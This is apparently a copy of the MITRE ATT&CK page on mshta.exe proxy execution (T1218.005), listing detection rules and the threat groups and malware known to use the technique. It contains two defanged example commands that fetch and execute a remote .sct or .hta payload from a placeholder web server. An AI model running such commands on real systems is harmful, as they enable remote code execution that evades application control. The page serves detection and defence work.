Sub-technique of T1218 System Binary Proxy Execution.View on attack.mitre.org
Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.
Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta
Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.
Rules on DetectionCode tagged with T1218.005.
| Rule | Level | Log source |
|---|---|---|
| Csc.EXE Execution Form Potentially Suspicious Parent | high | windows / process_creation |
| HackTool - CACTUSTORCH Remote Thread Creation | high | windows / create_remote_thread |
| MSHTA Execution with Suspicious File Extensions | high | windows / process_creation |
| Potential LethalHTA Technique Execution | high | windows / process_creation |
| Remotely Hosted HTA File Executed Via Mshta.EXE | high | windows / process_creation |
| Suspicious JavaScript Execution Via Mshta.EXE | high | windows / process_creation |
| Suspicious MSHTA Child Process | high | windows / process_creation |
| Rule | Type | Risk | Data source |
|---|---|---|---|
| Cisco NVM - MSHTML or MSHTA Network Execution Without URL in CLI | Anomaly | NULL | Cisco Network Visibility Module Flow Data |
| Cisco NVM - Rundll32 Abuse of MSHTML.DLL for Payload Download | Anomaly | NULL | Cisco Network Visibility Module Flow Data |
| Detect mshta inline hta execution | TTP | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| Detect mshta renamed | Hunting | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| Detect MSHTA Url in Command Line | TTP | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2, Cisco Network Visibility Module Flow Data |
| Detect Rundll32 Inline HTA Execution | TTP | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| Mshta spawning Rundll32 OR Regsvr32 Process | TTP | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| Suspicious mshta child process | TTP | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| Suspicious mshta spawn | TTP | NULL | Sysmon EventID 1, Windows Event Log Security 4688, CrowdStrike ProcessRollup2 |
| Windows Mshta Execution In Registry | TTP | NULL | Sysmon EventID 13 |
| Windows MSHTA Writing to World Writable Path | TTP | NULL | Sysmon EventID 11 |
| Windows Process Writing File to World Writable Path | Hunting | NULL | Sysmon EventID 11 |
| Used by | Procedure example |
|---|---|
| GroupAPT29 | APT29 has use `mshta` to execute malicious scripts on a compromised host. |
| GroupAPT32 | APT32 has used mshta.exe for code execution. |
| GroupAPT38 | APT38 has used a renamed version of `mshta.exe` to execute malicious HTML files. |
| GroupConfucius | Confucius has used mshta.exe to execute malicious VBScript. |
| GroupEarth Lusca | Earth Lusca has used `mshta.exe` to load an HTA script within a malicious .LNK file. |
| GroupFIN7 | FIN7 has used mshta.exe to execute VBScript to execute malicious code on victim systems. |
| GroupGamaredon Group | Gamaredon Group has used `mshta.exe` to execute malicious files. |
| GroupInception | Inception has used malicious HTA files to drop and execute malware. |
| Used by | Procedure example |
|---|---|
| MalwareBabyShark | BabyShark has used mshta.exe to download and execute applications from a remote server. |
| ToolCovenant | Covenant can create HTA files to install Grunt listeners. |
| ToolKoadic | Koadic can use mshta to serve additional payloads and to help schedule tasks for persistence. |
| MalwareLumma Stealer | Lumma Stealer has used mshta.exe to execute additional content. |
| MalwareMetamorfo | Metamorfo has used mshta.exe to execute a HTA payload. |
| MalwareNanHaiShu | NanHaiShu uses mshta.exe to load its program and files. |
| MalwarePOWERSTATS | POWERSTATS can use Mshta.exe to execute additional payloads on compromised hosts. |
| MalwarePteranodon | Pteranodon can use mshta.exe to execute an HTA file hosted on a remote server. |
| Used by | Procedure example |
|---|---|
| CampaignC0015 | During C0015, the threat actors used `mshta` to execute DLLs. |
| CampaignOperation Dust Storm | During Operation Dust Storm, the threat actors executed JavaScript code via `mshta.exe`. |
Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.